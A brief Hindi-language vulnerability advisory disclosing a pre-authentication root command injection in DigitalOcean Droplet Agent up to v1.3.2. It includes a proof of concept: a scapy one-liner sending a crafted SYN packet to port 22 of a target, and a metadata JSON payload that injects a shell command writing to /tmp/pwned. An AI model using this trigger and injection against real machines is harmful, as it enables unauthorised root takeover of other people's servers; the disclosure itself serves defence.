
# DigitalOcean Droplet Agent v1.3.2 तक में प्री-ऑथ रूट RCE (CVSS 10.0) — कमांड इंजेक्शन के माध्यम से
DigitalOcean Droplet Agent के v1.3.2 तक के संस्करणों में कमांड इंजेक्शन के माध्यम से क्रिटिकल प्री-ऑथ रूट RCE (CVSS 10.0)।
DigitalOcean Droplet Agent (1.3.2 तक के सभी संस्करण) में एक क्रिटिकल कमांड इंजेक्शन भेद्यता खोजी गई है। यह दोष एक हमलावर को बिना किसी प्रमाणीकरण के रूट विशेषाधिकारों के साथ रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देता है।
खोजकर्ता: अनमोल सिंह राजपूत (@pox_sky_01) - कॉर्टेक्स सिक्योरिटी रिसर्च
यह भेद्यता समस्या निवारण एक्शनर घटक में मौजूद है:
internal/troubleshooting/actioner/actioner.gointernal/troubleshooting/command/exec.goएजेंट स्थानीय सेवा (169.254.169.254) से मेटाडेटा संसाधित करता है और सरणी से कमांड को उचित सैनिटाइज़ेशन के बिना निष्पादित करता है।
TroubleshootingAgent.Requestingएजेंट पोर्ट 22 पर एक विशिष्ट TCP पैकेट द्वारा ट्रिगर होता है:
फ़ेच ट्रिगर करें:
python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"
दुर्भावनापूर्ण मेटाडेटा पेलोड:
{
"troubleshooting_agent": {
"requesting": ["command:id > /tmp/pwned"]
}
}
प्रभाव CVSS स्कोर: 10.0 (क्रिटिकल)
आवश्यक विशेषाधिकार: कोई नहीं
परिणाम: पूर्ण सिस्टम समझौता (रूट एक्सेस)
